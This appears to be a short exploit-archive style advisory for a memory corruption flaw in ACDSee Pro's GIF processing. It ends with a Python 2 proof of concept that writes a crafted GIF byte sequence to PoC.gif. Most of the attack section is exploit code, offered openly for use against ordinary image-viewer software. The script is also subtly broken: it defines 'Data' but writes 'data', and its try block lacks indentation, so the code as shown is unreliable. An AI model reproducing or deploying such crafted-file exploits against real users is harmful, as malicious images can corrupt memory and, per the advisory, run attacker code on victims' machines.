|
# Title : ACDSee PRO .GIF Processing Memory Corruption Vulnerability
# Auther : Senator of Pirates
# FaceBook : /SenatorofPiratesInfo
# E-Mail : Senator.of.Pirates.team[at]gmail.com
# Greeting : To my best friend Mr. Marshal Webb
# Bug :
--------
Memory corruption flaw exists in ACDSee Pro. The program fails to sanitize user-supplied input when
an error occurs in IDE_ACDStd.apl resulting in memory corruption. When allocating memory based on
values in the Logical Screen Descriptor structure of a GIF image, a context-dependent attacker can execute
arbitrary code.
# PoC :
---------
Data = ("\x49\x46\x38\x39\x61\x0C\x00\x0C\x00\x00\xE3\x00\x00\x00\x00\x80\x00\x00\x00\x80"
"\x00\x80\x80\x00\x00\x00\x80\x80\x00\x80\x00\x80\x80\x80\x80\x80\xC0\xC0\xC0\xFF\x00"
"\x00\x00\xFF\x00\xFF\xFF\x00\x00\x00\xFF\xFF\x00\xFF\x00\xFF\xFF\xFF\xFF\xFF\x21\xF9"
"\x04\x01\x00\x00\x0F\x00\x2C\x00\x00\x00\x00\x0C\x00\x0C\x00\x00\x04\x2C\xF0\xC8\x49"
"\x27\xB8\x38\xA3\x03\x1E\xF2\xE0\xB7\x01\x62\x78\x20\x63\xE8\x49\x2B\x79\xAE\x12\xCA"
"\x3D\xF1\x24\x72\x1B\x25\xA6\xF9\x7B\x93\xAB\x92\xAC\x23\x34\xA1\x8E\x48\x54\x04\x00"
"\x3B");
try:
A = open("PoC.gif","wb")
A.write(data)
A.close()
print "[*] The file created [*]"
except:
print "[*] Error while creating file [*]"
print "[*] Enter to continue.. [*]"
raw_input()
|
推荐
评论(0条)
